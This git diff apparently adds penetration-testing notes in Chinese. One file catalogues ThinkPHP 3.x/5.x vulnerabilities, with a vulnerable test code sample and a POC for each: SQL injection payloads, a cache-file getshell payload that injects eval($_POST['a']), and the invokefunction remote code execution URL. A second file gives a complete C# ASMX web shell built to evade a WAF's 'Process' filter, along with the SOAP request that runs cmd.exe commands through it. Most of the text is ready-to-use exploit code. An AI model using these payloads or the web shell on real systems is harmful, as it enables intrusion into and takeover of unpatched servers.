diff --git a/tp5-getshell/ThinkPHP.md b/tp5-getshell/ThinkPHP.md
new file mode 100644
index 0000000..eae2fe0
--- /dev/null
+++ b/tp5-getshell/ThinkPHP.md
@@ -0,0 +1,241 @@
+## ThinkPHP 漏洞列表
+
+### 一、3.x
+
+>使用方法
+>
+>```bash
+>cd /var/www/tp3
+>```
+>
+
+#### ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell
+
+| 标题 | ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell |
+| -------- | -------------------------------------------------- |
+| 时间 | 2017-08-09 |
+| 版本 | <= 3.2.3 |
+| 文章链接 | |
+
+
+#### ThinkPHP3.2.3_最新版update注入漏洞
+
+| 标题 | Thinkphp3.2.3最新版update注入漏洞 |
+| -------- | ----------------------------------------- |
+| 时间 | 2018-04-16 |
+| 版本 | <= 3.2.3 |
+| 文章链接 | |
+
+
+#### ThinkPHP3.2.X_find_select_delete注入
+
+| 标题 | thinkphp3.2 find_select_delete注入 |
+| -------- | ------------------------------------------------------------ |
+| 时间 | 2018-08-23 |
+| 版本 | <= 3.2.3 |
+| 文章链接 | |
+
+#### ThinkPHP3.X_order_by注入漏洞
+
+| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 |
+| -------- | --------------------------------------------------- |
+| 时间 | 2018-08-29 |
+| 版本 | <= 3.2.3 |
+| 文章链接 | |
+
+
+### 二、5.x
+
+>使用方法
+>
+>```bash
+>cd /var/www/tp5
+>```
+>
+
+#### ThinkPHP5_SQL注入漏洞&&敏感信息泄露
+
+| 标题 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 |
+| -------- | ------------------------------------------------------------ |
+| 时间 | 2017-07-03 |
+| 版本 | < 5.0.9 |
+| 文章链接 | https://xz.aliyun.com/t/125 |
+
+>测试方法
+>
+>```bash
+>git checkout 02f8e8a
+>```
+>
+>测试代码
+>
+>```php
+>public function testsql()
+>{
+> $ids = input('ids/a');
+> $result = db('user')->where('id', 'in', $ids)->select();
+> var_dump($result);
+>}
+>```
+>
+>POC
+>
+>```php
+>testsql?ids[0,updatexml(0,concat(0xa,user()),0)]=1231
+>```
+>
+>结果
+>
+>![20170703.png](image/ThinkPHP/2017-07-03.png)
+
+#### ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell
+
+| 标题 | ThinkPHP5.0.10-3.2.3 缓存函数设计缺陷可导致Getshell |
+| -------- | --------------------------------------------------- |
+| 时间 | 2017-08-09 |
+| 版本 | < 5.0.11 |
+| 文章链接 | |
+
+ >测试方法
+ >
+ >```bash
+ >git checkout 094dde5
+ >```
+ >
+ >测试代码
+ >
+ >```php
+ >public function add()
+ >{
+ > $user = input('post.');
+ > $m=db('user')->where(['id'=> 1])->insert($user);
+ >}
+ >
+ >public function cache()
+ >{
+ > $m = db('user')->select();
+ > Cache::set('name',$m,3600);
+ >}
+ >```
+ >
+ >POC
+ >
+ >```php
+ >post data:
+ > username=%2F%2F%0D%0A%24a%3Deval(%24_POST%5B%27a%27%5D)%3B%23
+ >注:%2F%2F%0D%0A = //+回车
+ >```
+ >
+ >结果
+ >
+ >![img](image/ThinkPHP/2017-08-09-1.png)
+ >
+ >![img](image/ThinkPHP/2017-08-09-2.png)
+ >
+ >![img](image/ThinkPHP/2017-08-09-3.png)
+ >
+ >其中文件路径和名称是 b0+68931cc450442b63f5b3d276ea4297 而
+ >
+ >md5('name') = b068931cc450442b63f5b3d276ea4297
+
+#### ThinkPHP框架5.0.X_sql注入漏洞分析
+
+| 标题 | ThinkPHP框架 5.0.x sql注入漏洞分析 |
+| -------- | --------------------------------------------------- |
+| 时间 | 2018-04-09 |
+| 版本 | < 5.0.16 |
+| 文章链接 | |
+
+>测试方法
+>
+>```bash
+>git checkout 7c13757
+>```
+>
+>测试代码
+>
+>```php
+>public function testsql()
+> {
+> $username = input('get.username/a');
+> db('user')->where(['id'=> 1])->insert(['username'=>$username]);
+> }
+>```
+>
+>POC
+>
+>```php
+>testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1
+>```
+>
+>结果
+>
+>![img](image/ThinkPHP/2018-04-09.png)
+
+#### ThinkPHP5.X_order_by注入漏洞
+
+| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 |
+| -------- | --------------------------------------------------- |
+| 时间 | 2018-08-23 |
+| 版本 | <= 5.1.22 |
+| 文章链接 | |
+
+>测试方法
+>
+>```bash
+>git checkout 35e9878
+>```
+>
+>测试代码
+>
+>```php
+>public function testsql()
+>{
+> $order = input('get.order');
+> $m = db('user')->order($order)->find();
+> var_dump($m);
+>}
+>```
+>
+>POC
+>
+>```php
+>testsql?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1
+>```
+>
+>结果
+>
+>![img](image/ThinkPHP/2018-08-23.png)
+
+#### ThinkPHP5.X_远程代码执行
+
+| 标题 | ThinkPHP5.X 远程代码执行 |
+| -------- | ------------------------------------------------------------ |
+| 时间 | 2018-12-10 |
+| 版本 | 5.0.5-5.0.22 5.1.0-5.1.30 |
+| 文章链接 | https://paper.seebug.org/760/ |
+>测试方法
+>
+>```bash
+>git checkout 4fefa5e
+>```
+>
+>测试代码
+>
+>```php
+>public function index()
+> {
+> //...无需实际代码
+> }
+> ```
+>
+>POC
+>
+>```php
+>index?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
+>```
+>
+>结果
+>
+>![img](image/ThinkPHP/2018-12-10.png)
+
diff --git a/tp5-getshell/image/ThinkPHP/2017-07-03.png b/tp5-getshell/image/ThinkPHP/2017-07-03.png
new file mode 100644
index 0000000..62e5f52
Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-07-03.png differ
diff --git a/tp5-getshell/image/ThinkPHP/2017-08-09-1.png b/tp5-getshell/image/ThinkPHP/2017-08-09-1.png
new file mode 100644
index 0000000..558127d
Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-08-09-1.png differ
diff --git a/tp5-getshell/image/ThinkPHP/2017-08-09-2.png b/tp5-getshell/image/ThinkPHP/2017-08-09-2.png
new file mode 100644
index 0000000..d4203f7
Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-08-09-2.png differ
diff --git a/tp5-getshell/image/ThinkPHP/2017-08-09-3.png b/tp5-getshell/image/ThinkPHP/2017-08-09-3.png
new file mode 100644
index 0000000..38040da
Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-08-09-3.png differ
diff --git a/tp5-getshell/image/ThinkPHP/2018-04-09.png b/tp5-getshell/image/ThinkPHP/2018-04-09.png
new file mode 100644
index 0000000..b22fbe9
Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2018-04-09.png differ
diff --git a/tp5-getshell/image/ThinkPHP/2018-08-23.png b/tp5-getshell/image/ThinkPHP/2018-08-23.png
new file mode 100644
index 0000000..20f94fe
Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2018-08-23.png differ
diff --git a/tp5-getshell/image/ThinkPHP/2018-12-10.png b/tp5-getshell/image/ThinkPHP/2018-12-10.png
new file mode 100644
index 0000000..6ae2361
Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2018-12-10.png differ
diff --git a/构建ASMX绕过限制WAF达到命令执行.md b/构建ASMX绕过限制WAF达到命令执行.md
new file mode 100644
index 0000000..9c49493
--- /dev/null
+++ b/构建ASMX绕过限制WAF达到命令执行.md
@@ -0,0 +1,117 @@ +### 以下信息来自倾旋知识星球,在此做整理 + +> 近日,在遇到一个WAF,目标服务器配置如下: + +> 1. ASP.NET +> 2.IIS +> 3.Windows +> 4.X WAF +> 5.不允许上传 ASP、ASPX、ASA、CER、.... +> 6.任意文件上传漏洞 +> 于是想到还有ASMX,构建SOAP接口,分享给大家以便留存 +> 另外,WAF还拦截“Process()”,于是在C#代码里,创建了一个子类继承Process父类,然后实例化: + +![](img/process.png) + +``` +public class New_Process :Process +{ + public New_Process(string s) + { + + } + +} + +Process e = new New_Process("something"); +``` + +``` +POST /UploadPath/User/201908221824334713.asmx HTTP/1.1 +Host: example.com +Content-Type: text/xml; charset=utf-8 +Content-Length: 363 +SOAPAction: "http://payloads.online/Test" + + + + + + cmd.exe + /c whoami + + + +``` +--------------------------------------------------- + +![](img/ASMX.png) +``` +<%@ WebService Language="C#" Class="Service" %> +using System; +using System.Web; +using System.IO; +using System.Net; +using System.Text; +using System.Data; +using System.Data.SqlClient; +using System.Collections.Generic; +using System.Diagnostics; +using System.Web.SessionState; +using System.Web.Services; +using System.Xml; +using System.Web.Services.Protocols; + +[WebService(Namespace = "http://payloads.online/")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] + +public class New_Process :Process +{ + public New_Process(string s) + { + + } + +} + + +public class Service : System.Web.Services.WebService +{ + public Service() + { + + } + + [WebMethod] + public string Test(string Z1,string Z2) + { + String R; + + ProcessStartInfo c = new ProcessStartInfo(Z1,Z2); + Process e = new New_Process("something"); + StreamReader OT, ER; + c.UseShellExecute = false; + c.RedirectStandardOutput = true; + c.RedirectStandardError = true; + e.StartInfo = c; + + e.Start(); + OT = e.StandardOutput; + ER = e.StandardError; + e.Close(); + R = OT.ReadToEnd() + ER.ReadToEnd(); + HttpContext.Current.Response.Clear(); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + 
HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.End(); + return R; + } +} +``` +